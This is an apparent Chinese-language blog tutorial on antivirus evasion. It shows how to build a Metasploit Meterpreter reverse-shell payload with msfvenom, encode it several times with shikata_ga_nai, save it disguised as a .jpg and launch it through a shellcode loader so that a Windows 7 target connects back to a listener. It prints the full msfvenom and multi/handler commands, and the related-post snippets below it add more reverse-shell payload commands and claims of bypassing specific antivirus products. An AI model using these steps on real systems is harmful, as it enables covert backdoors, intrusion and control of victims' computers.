MSF编码器结合shellcode加载器实现免杀

最新推荐文章于 2025-01-13 17:54:44 发布
最新推荐文章于 2025-01-13 17:54:44 发布
阅读量497 收藏 4
点赞数 3
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_83237906/article/details/144015249
版权
所用环境:Kali Linux + Windows7
免杀技术简介: 免杀技术全称为反杀毒技术, Anti-Virus 简称“免杀”,指是一种能使病毒木马免于被杀毒软件查杀的技术。免杀技术的涉猎面广泛,其中包含反汇编、逆向工程、系统漏洞等技术,内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

VirusTotal

这里介绍一个网站VirusTotal ,这是一个免费的在线服务,它允许用户上传文件或提交网址,以检查它们是否包含恶意软件或其他潜在的安全威胁。VirusTotal 通过使用多种不同的病毒扫描引擎和安全工具来分析提交的文件或链接,从而提供更全面的检测结果。

(不挂梯子上传不了文件;TIME:24/11/24)

我用之前在msfvenom生成后门程序上传看看:

72个检测引擎,53个都查得出来;

利用MSF自带的功能进行免杀

Meatsploit 框架下免杀的方式之一就是使用 MSF 编码器,其功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。 MSF 编码器可以将原可执行程序重新编码,生成 一个新的二进制文件,该文件运行后, MSF 编码器会将原始程序解码到内存中并执行。

生成shellcode文件(CROWSEC.JPG)

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'
lhost=192.168.70.128 lport=5558 -f raw -o crowsec.jpg

-p 指定payload是反弹shell

-e 选择编码器为x86.....

-i 编码次数

-b 指定替换的字符串为 '\x00'把这个嫌疑大的注释符给替换咯;

-f 真实字符

-o 输出文件

一下子隐蔽性高很多了噢;

这个ms是shellcode加载器来的,检测概率更低

crowsec.jpg ms.exe 放到目标同一目录,点击 ms.exe 即可上线
(如果编码器运行不成功,需要 msvcr110.dll 放到 C:\Windows\SysWOW64 下)

打开监听模块

设置好参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.70.128
set lport 5558

exploit开启

在靶机上,运行ms.exe

Getshell

 总结:

1.了解到了Virus Total这个在线监测网站;

2.学会制作shellcode和shellcode的使用;

3.锻炼对kali和windows系统的熟悉;

MSF编码与upx加壳过
悦分享
08-03 2566
本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行、加壳处理,从而突破毒软件。
MSF-Shellcode生成和MS15-020 渗透利用
Ifeeexxj的博客
01-03 787
1、生成window下后门程序 A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.130 LPORT=4444 -f exe > /qq.exe 2、重新打开一个配置窗口 use exploit/multi/handler set payloads windows/meterpreter/reverse_tcp s...
对抗-MSF\CS-shellcode进行base64编码,python调用执行
m0_62172162的博客
04-25 740
对抗-MSF\CS-shellcode进行base64编码,python调用执行
WEB渗透篇-MSF+shellcode
qq_59468567的博客
08-16 606
目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。
MSF 生成静态shell(win)
嘻嘻哈哈
01-26 2801
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
MSFconsole进阶】Encoders(编码器模块):编码器、使用方法
05-24 1832
【渗透工具】MSFconsole进阶:Encoders(编码器模块)
msf编码
m0_61506558的博客
09-03 2881
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1142
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
shellcode加密
longwanlian的博客
08-04 757
先说结论,笔者没成功过360。
对抗-MSF\CS-shellcode反序列化
m0_62172162的博客
04-25 664
对抗-MSF\CS-shellcode反序列化
MSF(Metasploit Framework)详细介绍及用法【新手篇】
h1008685的博客
04-04 5409
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2562
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
手段另辟蹊径!可轻松绕过近90%软【附带反制教程】
最新发布
ewii12567的博客
01-13 1539
众所周知,技术一直是网络安全技术的一个重头戏在日新月异的网络安攻防时代,各种木马手法层出不穷,从单一特征码到复合特征码,软防御手段也从无主动防御到有主动防御,一直不断地在演变着。但很多木马技术都只是停留在对特征码的混淆上,也就是代码绕过层面。但是,传统的木马都是两点一线的远控,一个被控制端,一个远程控制端,高级一点的会构建一套大型的僵尸网络系统,其本质没有太大的变化,都是控制端和被控制端的直接传输。
MSF使用1
xhscxj的博客
06-12 3737
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
MSF使用详解
m0_52051132的博客
10-19 8473
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被毒软件监测到。
msf的实战使用——msfvenom
tomyyyyy
05-11 3023
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
Kali下Metasploit的shellcode在windows中的使用
weixin_33744141的博客
02-24 742
网络拓扑:kaili系统版本:注:前面的版本在生成shellcode的时候用的是msfpayload命令 1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe &gt; /root/shell.exe()2.侦...
Shellcode分离加载实现的两种方式(VT率:1/68)
xf555er的博客
05-24 3222
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
基本知识,shellcode混淆
2401_84488537的博客
09-02 1380
1、这里首先使用msf生成基于windows的32位的反弹shell的c/c++语言格式的shellcode。使用visual studio进行生成exe文件,这里使用方式四进行加载,后续会讲到。这里是五种常见的加载代码的方式,选择Release模式,系统为x86,选择生成-->生成解决方案。将生成的exe文件放到相应的win32系统上面运行,msf方面就会上线,(注意目前的shellcode没有做,测试时将毒软件关闭)。接下来让我们分析一下这个exe文件时如何上线到正确的地址的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值